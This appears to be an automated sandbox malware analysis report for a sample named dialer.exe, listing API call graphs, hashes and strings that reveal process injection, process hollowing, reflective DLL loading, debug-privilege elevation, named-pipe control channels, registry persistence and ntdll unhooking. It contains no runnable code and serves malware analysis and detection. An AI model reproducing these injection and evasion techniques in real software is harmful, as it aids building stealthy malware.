                                                                          • Instruction Fuzzy Hash: C0011731300B4482EA58DB52A8587D963A5F78CBC5F8880B5FF5943759DE3EC9C9C740
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: 0ffdca176683bdef783f6cc38966b29c572938d531d7664521ae4e1a6e9a6e3b
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: BB012175712B4086FF289B26F8087D563A0BB4DB86F448564EF4907769EF3EC1848700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction ID: 2a58f658a7c323e470c1cbcda14de2c9a5e7c4f84a17343fc423aba172ae85f9
                                                                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction Fuzzy Hash: 9E516B32601700C6EB98DB29E848BDB6799F388B88F5085A4EF5A4774CDF76C991C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: c4f5a9f3bdec7750fb076a0b2b05ac044ba42cffe882208c901e174971607999
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: 50F08732700B4482EB648B60E8843DA6360F78CBD8FC48060FF4946A58DE6EC6CDCB00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 0f3f3d578e1d262db9181b57571857c6ede4d717d0689bd243bedd7d7285528d
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: A0F0F874714B8482EA588B53B9141D96661AB8CFE1F8891A0FF5A47B6CDE39C4C58700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: df2875fcd967808f31e72bcdc182bb135dbcc85f3a08aea4505e896a4e7a5df2
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: D5F06271211B0482EB188B24E4443D96320EB8C765F948299FF6A466ECCF2EC4C4C350
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: d3b9a58ef7fdfc98620847497ecba833532ef1df5abfce1ac3323b88e95c3dec
                                                                          • Instruction ID: 8119352017edbc1e5719dbc53e8a196e932012c0c71d1048414cb63e1174155f
                                                                          • Opcode Fuzzy Hash: d3b9a58ef7fdfc98620847497ecba833532ef1df5abfce1ac3323b88e95c3dec
                                                                          • Instruction Fuzzy Hash: A7619336919B84C7E668CB59E44439AB7A0F3C8794F101565FB8E87BA8DF7AC584CB00
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316783010.000001160CA10000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca10000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874

                                                                          Execution Graph

                                                                          Execution Coverage:48.5%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:226
                                                                          Total number of Limit Nodes:22
                                                                          execution_graph 384 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 385 140002b8e K32EnumProcesses 384->385 386 140002beb SleepEx 385->386 387 140002ba3 385->387 386->385 387->386 389 140002540 387->389 390 140002558 389->390 391 14000254d 389->391 390->387 393 1400010c0 391->393 431 1400018ac OpenProcess 393->431 396 1400014ba 396->390 397 140001122 OpenProcess 397->396 398 14000113e OpenProcess 397->398 399 140001161 K32GetModuleFileNameExW 398->399 400 1400011fd NtQueryInformationProcess 398->400 401 1400011aa CloseHandle 399->401 402 14000117a PathFindFileNameW lstrlenW 399->402 403 1400014b1 CloseHandle 400->403 404 140001224 400->404 401->400 406 1400011b8 401->406 402->401 405 140001197 StrCpyW 402->405 403->396 404->403 407 140001230 OpenProcessToken 404->407 405->401 406->400 408 1400011d8 StrCmpIW 406->408 407->403 409 14000124e GetTokenInformation 407->409 408->403 408->406 410 1400012f1 409->410 411 140001276 GetLastError 409->411 412 1400012f8 CloseHandle 410->412 411->410 413 140001281 LocalAlloc 411->413 412->403 418 14000130c 412->418 413->410 414 140001297 GetTokenInformation 413->414 415 1400012df 414->415 416 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 414->416 417 1400012e6 LocalFree 415->417 416->417 417->412 418->403 419 14000139b StrStrA 418->419 420 1400013c3 418->420 419->418 421 1400013c8 419->421 420->403 421->403 422 1400013f3 VirtualAllocEx 421->422 422->403 423 140001420 WriteProcessMemory 422->423 423->403 424 14000143b 423->424 436 14000211c 424->436 426 14000145b 426->403 427 140001478 WaitForSingleObject 426->427 430 140001471 CloseHandle 426->430 429 140001487 GetExitCodeThread 427->429 427->430 429->430 430->403 432 14000110e 431->432 433 1400018d8 IsWow64Process 431->433 432->396 432->397 434 1400018f8 CloseHandle 433->434 435 1400018ea 433->435 434->432 435->434 439 140001914 GetModuleHandleA 436->439 440 140001934 GetProcAddress 
439->440 441 14000193d 439->441 440->441 442 140002bf8 443 140002c05 442->443 445 140002c25 ConnectNamedPipe 443->445 446 140002c1a Sleep 443->446 453 140001b54 AllocateAndInitializeSid 443->453 447 140002c83 Sleep 445->447 448 140002c34 ReadFile 445->448 446->443 450 140002c8e DisconnectNamedPipe 447->450 449 140002c57 448->449 448->450 460 140002524 449->460 450->445 454 140001bb1 SetEntriesInAclW 453->454 455 140001c6f 453->455 454->455 456 140001bf5 LocalAlloc 454->456 455->443 456->455 457 140001c09 InitializeSecurityDescriptor 456->457 457->455 458 140001c19 SetSecurityDescriptorDacl 457->458 458->455 459 140001c30 CreateNamedPipeW 458->459 459->455 461 140002531 460->461 462 140002539 WriteFile 460->462 463 1400010c0 30 API calls 461->463 462->450 463->462 464 140002258 467 14000226c 464->467 491 140001f2c 467->491 470 140001f2c 14 API calls 471 14000228f GetCurrentProcessId OpenProcess 470->471 472 140002321 FindResourceExA 471->472 473 1400022af OpenProcessToken 471->473 476 140002341 SizeofResource 472->476 477 140002261 ExitProcess 472->477 474 1400022c3 LookupPrivilegeValueW 473->474 475 140002318 CloseHandle 473->475 474->475 478 1400022da AdjustTokenPrivileges 474->478 475->472 476->477 479 14000235a LoadResource 476->479 478->475 480 140002312 GetLastError 478->480 479->477 481 14000236e LockResource GetCurrentProcessId 479->481 480->475 505 1400017ec GetProcessHeap HeapAlloc 481->505 483 14000238b RegCreateKeyExW 484 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 483->484 485 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 483->485 486 14000250f SleepEx 484->486 487 1400023f4 RegSetKeySecurity LocalFree 485->487 488 14000240e RegCreateKeyExW 485->488 486->486 487->488 489 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 488->489 490 14000247f RegCloseKey 488->490 489->490 490->484 492 140001f35 StrCpyW StrCatW GetModuleHandleW 491->492 493 1400020ff 491->493 492->493 494 140001f86 GetCurrentProcess 
K32GetModuleInformation 492->494 493->470 495 1400020f6 FreeLibrary 494->495 496 140001fb6 CreateFileW 494->496 495->493 496->495 497 140001feb CreateFileMappingW 496->497 498 140002014 MapViewOfFile 497->498 499 1400020ed CloseHandle 497->499 500 1400020e4 CloseHandle 498->500 501 140002037 498->501 499->495 500->499 501->500 502 140002050 lstrcmpiA 501->502 504 14000208e 501->504 502->501 503 140002090 VirtualProtect VirtualProtect 502->503 503->500 504->500 511 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 505->511 507 140001885 GetProcessHeap HeapFree 508 140001830 508->507 509 140001851 OpenProcess 508->509 509->508 510 140001867 TerminateProcess CloseHandle 509->510 510->508 512 140001565 511->512 513 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 511->513 512->513 514 14000157a OpenProcess 512->514 516 14000161a CloseHandle 512->516 517 1400015c9 ReadProcessMemory 512->517 513->508 514->512 515 140001597 K32EnumProcessModules 514->515 515->512 515->516 516->512 517->512 518 1400021d0 519 1400021dd 518->519 520 140001b54 6 API calls 519->520 521 1400021f2 Sleep 519->521 522 1400021fd ConnectNamedPipe 519->522 520->519 521->519 523 140002241 Sleep 522->523 524 14000220c ReadFile 522->524 525 14000224c DisconnectNamedPipe 523->525 524->525 526 14000222f 524->526 525->522 526->525 527 140002560 528 140002592 527->528 529 14000273a 527->529 530 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 528->530 531 140002598 528->531 532 140002748 529->532 533 14000297e ReadFile 529->533 534 140002633 530->534 536 140002704 530->536 537 1400025a5 531->537 538 1400026bd ExitProcess 531->538 539 140002751 532->539 540 140002974 532->540 533->534 535 1400029a8 533->535 535->534 548 1400018ac 3 API calls 535->548 536->534 550 1400010c0 30 API calls 536->550 544 1400025ae 537->544 545 140002660 RegOpenKeyExW 537->545 541 140002919 539->541 542 14000275c 539->542 543 14000175c 22 API calls 540->543 549 140001944 ReadFile 
541->549 546 140002761 542->546 547 14000279d 542->547 543->534 544->534 560 1400025cb ReadFile 544->560 551 1400026a1 545->551 552 14000268d RegDeleteValueW 545->552 546->534 609 14000217c 546->609 612 140001944 547->612 553 1400029c7 548->553 555 140002928 549->555 550->536 596 1400019c4 SysAllocString SysAllocString CoInitializeEx 551->596 552->551 553->534 564 1400029db GetProcessHeap HeapAlloc 553->564 565 140002638 553->565 555->534 567 140001944 ReadFile 555->567 559 1400026a6 604 14000175c GetProcessHeap HeapAlloc 559->604 560->534 562 1400025f5 560->562 562->534 574 1400018ac 3 API calls 562->574 570 1400014d8 13 API calls 564->570 576 140002a90 4 API calls 565->576 566 1400027b4 ReadFile 566->534 571 1400027dc 566->571 572 14000293f 567->572 587 140002a14 570->587 571->534 577 1400027e9 GetProcessHeap HeapAlloc ReadFile 571->577 572->534 578 140002947 ShellExecuteW 572->578 580 140002614 574->580 576->534 582 14000290b GetProcessHeap 577->582 583 14000282d 577->583 578->534 580->534 580->565 586 140002624 580->586 581 140002a49 GetProcessHeap 584 140002a52 HeapFree 581->584 582->584 583->582 588 140002881 lstrlenW GetProcessHeap HeapAlloc 583->588 589 14000285e 583->589 584->534 590 1400010c0 30 API calls 586->590 587->581 636 1400016cc 587->636 630 140002a90 CreateFileW 588->630 589->582 616 140001c88 589->616 590->534 597 140001a11 CoInitializeSecurity 596->597 598 140001b2c SysFreeString SysFreeString 596->598 599 140001a59 CoCreateInstance 597->599 600 140001a4d 597->600 598->559 601 140001b26 CoUninitialize 599->601 602 140001a88 VariantInit 599->602 600->599 600->601 601->598 603 140001ade 602->603 603->601 605 1400014d8 13 API calls 604->605 607 14000179a 605->607 606 1400017c8 GetProcessHeap HeapFree 607->606 608 1400016cc 5 API calls 607->608 608->607 610 140001914 2 API calls 609->610 611 140002191 610->611 613 140001968 ReadFile 612->613 614 14000198b 613->614 615 1400019a5 613->615 614->613 614->615 615->534 615->566 617 140001cbb 616->617 618 
140001cce CreateProcessW 617->618 620 140001e97 617->620 622 140001e62 OpenProcess 617->622 624 140001dd2 VirtualAlloc 617->624 626 140001d8c WriteProcessMemory 617->626 618->617 619 140001d2b VirtualAllocEx 618->619 619->617 621 140001d60 WriteProcessMemory 619->621 620->582 621->617 622->617 623 140001e78 TerminateProcess 622->623 623->617 624->617 625 140001df1 GetThreadContext 624->625 625->617 627 140001e09 WriteProcessMemory 625->627 626->617 627->617 628 140001e30 SetThreadContext 627->628 628->617 629 140001e4e ResumeThread 628->629 629->617 629->620 631 1400028f7 GetProcessHeap HeapFree 630->631 632 140002ada WriteFile 630->632 631->582 633 140002b1c CloseHandle 632->633 634 140002afe 632->634 633->631 634->633 635 140002b02 WriteFile 634->635 635->633 637 140001745 636->637 638 1400016eb OpenProcess 636->638 637->581 638->637 639 140001703 638->639 640 14000211c 2 API calls 639->640 641 140001723 640->641 642 14000173c CloseHandle 641->642 643 140001731 CloseHandle 641->643 642->637 643->642

                                                                          Callgraph

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                          • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                          • API String ID: 4177739653-1130149537
                                                                          • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                          • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                          • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                          • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b 
GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                          • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                          • API String ID: 2561231171-3753927220
                                                                          • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                          • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                          • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                          • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                          • String ID:
                                                                          • API String ID: 4084875642-0
                                                                          • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                          • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                          • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                          • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                          • String ID: .text$C:\Windows\System32\
                                                                          • API String ID: 2721474350-832442975
                                                                          • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                          • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                          • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                          • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                          • String ID: M$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2203880229-3489460547
                                                                          • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                                          • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                          • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                                          • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 135 140002241-140002246 Sleep 134->135 136 14000220c-14000222d ReadFile 134->136 137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 137->134 138->137 139 140002236-14000223f 138->139 139->137
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                                          • API String ID: 2071455217-3440882674
                                                                          • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                                          • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                          • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                                          • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                          • String ID:
                                                                          • API String ID: 3197395349-0
                                                                          • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                          • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                          • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                          • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 149 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 150 140002b8e-140002ba1 K32EnumProcesses 149->150 151 140002ba3-140002bb2 150->151 152 140002beb-140002bf4 SleepEx 150->152 153 140002bb4-140002bb8 151->153 154 140002bdc-140002be7 151->154 152->150 155 140002bba 153->155 156 140002bcb-140002bce call 140002540 153->156 154->152 157 140002bbe-140002bc3 155->157 160 140002bd2 156->160 158 140002bc5-140002bc9 157->158 159 140002bd6-140002bda 157->159 158->156 158->157 159->153 159->154 160->159
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000003E.00000002.3278631713.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000003E.00000002.3278334574.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3278899417.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 0000003E.00000002.3279073587.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                          • String ID:
                                                                          • API String ID: 3676546796-0
                                                                          • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                          • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
